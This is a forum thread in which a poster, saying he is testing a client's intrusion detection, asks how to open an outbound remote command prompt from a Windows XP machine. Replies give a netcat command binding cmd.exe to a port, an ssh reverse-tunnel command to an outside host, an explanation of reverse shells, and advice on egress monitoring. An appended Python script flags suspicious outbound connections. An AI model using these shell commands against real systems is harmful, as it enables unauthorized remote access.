April 7th, 2006, 12:11 AM
Reverse Command Prompt Suggestions
I didn't know exactly which forum to post this question in. I thought this would be the most logical.
I am conducting a test of technical security controls for a client and I'm looking for the easiest way to do this. I mainly want to test their IDS and AV capabilities. This is not a comprehensive test of their systems, just a part, as you can see.
I would like your suggestions on programs that can spawn a remote command prompt outbound through a firewall via a specific port from a WinXP box. The delivery method is a non-problem. I will ensure the files get on the system. Mainly I just need to have the shell get sent out of the firewall so I can connect to it.
Any thoughts would be appreciated. Simplicity is key here. As mentioned before, this is not a comprehensive test, just a one-off.
April 7th, 2006, 12:21 AM
netcat is your friend
netcat is one way.
That's after a really quick search and scan. I think it'll tell you how. Too lazy to look harder, but your Google terms should include: netcat shovel shell
caveat h4x0r - use of netcat may, can, and WILL likely get you fired if you don't have explicit permission and authorization.
"Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
"...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore
April 7th, 2006, 11:44 AM
Netcat is prolly the ideal way as has been suggested;
nc -l -p 23 -t -e cmd.exe
nc = netcat
-l = listen
-p = port (to be listened to)
23 = port number to be listened to (telnet in this case)
-t = tells it to listen to telnet connections
-e = execute
cmd.exe = [execute] command prompt
So in a nutshell, nc will listen on port 23 for a connection; when you connect, it will execute the command prompt.
Bear in mind though that if you are doing this on an enterprise network, nc will sit in front of whatever should be running on that port. So, say, if you ran it on port 139, 445, etc., it would be sitting in front of legitimate NetBIOS/file sharing applications.
April 9th, 2006, 06:16 PM
This pertains to Linux, but if this WinXP machine had Cygwin or similar, you could try using ssh.
Create an ssh tunnel from behind the firewall to the outside system.
"ssh -v -R 2222:localhost:22 outsideIP"
Then from the outside computer, connect to the localhost.
"ssh -p 2222 localhost"
This might not help you, but good to keep your options open in case.
The command completed successfully.
"They drew first blood not me."
April 10th, 2006, 02:12 PM
A reverse command prompt means the victim's machine connects back to the attacker.. Not the attacker connecting to the victim..
So I would have a netcat listening on a certain port, fire my exploit at the target, the target connects back to my netcat giving me a command prompt.. You can use this when the target doesn't allow incoming connections but does allow outgoing connections.. This is the reason you should monitor/firewall egress network traffic..
Experience is something you don't get until just after you need it.
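The last post's point about egress monitoring, as an added example that is not part of this thread: a small Python check over constructed firewall flow records that flags allowed outbound TCP sessions from an internal host to an external address on a port outside a hypothetical egress allow-list. A shell shovelled out on port 23 (the netcat listener above) or the ssh -R tunnel on 2222 would show up here; the log format, networks and port policy are all assumptions.

```python
# Added example (not from the thread): flag egress connections that a
# reverse command prompt would produce, i.e. an internal host opening an
# outbound TCP session to an external address on a non-allow-listed port.
# The log format, internal ranges and port policy below are constructed.
import ipaddress

INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Hypothetical policy: only these ports may leave the network directly.
ALLOWED_EGRESS_PORTS = {53, 80, 443}

# Constructed flow records: date time action proto src dst sport dport
SAMPLE_LOG = """\
2006-04-10 14:00:01 ALLOW TCP 192.168.1.20 10.1.1.5 3312 445
2006-04-10 14:00:03 ALLOW TCP 192.168.1.20 203.0.113.7 3313 443
2006-04-10 14:00:09 ALLOW TCP 192.168.1.20 203.0.113.9 3314 23
2006-04-10 14:00:12 ALLOW TCP 192.168.1.31 198.51.100.4 3402 2222
2006-04-10 14:00:15 DROP TCP 203.0.113.9 192.168.1.20 45000 23
"""

def is_internal(ip):
    """True if the address falls inside one of the internal ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def parse_line(line):
    """Split one constructed flow record into a dict."""
    date, time, action, proto, src, dst, sport, dport = line.split()
    return {"ts": f"{date} {time}", "action": action, "proto": proto,
            "src": src, "dst": dst, "sport": int(sport), "dport": int(dport)}

def suspicious_egress(log_text):
    """Return allowed outbound TCP records from an internal host to an
    external host whose destination port is not on the allow-list."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec["action"] != "ALLOW" or rec["proto"] != "TCP":
            continue  # inbound drops are the firewall doing its job
        if (is_internal(rec["src"]) and not is_internal(rec["dst"])
                and rec["dport"] not in ALLOWED_EGRESS_PORTS):
            hits.append(rec)
    return hits

if __name__ == "__main__":
    for h in suspicious_egress(SAMPLE_LOG):
        print(f"{h['ts']} {h['src']} -> {h['dst']}:{h['dport']} "
              "outbound on non-allow-listed port")
```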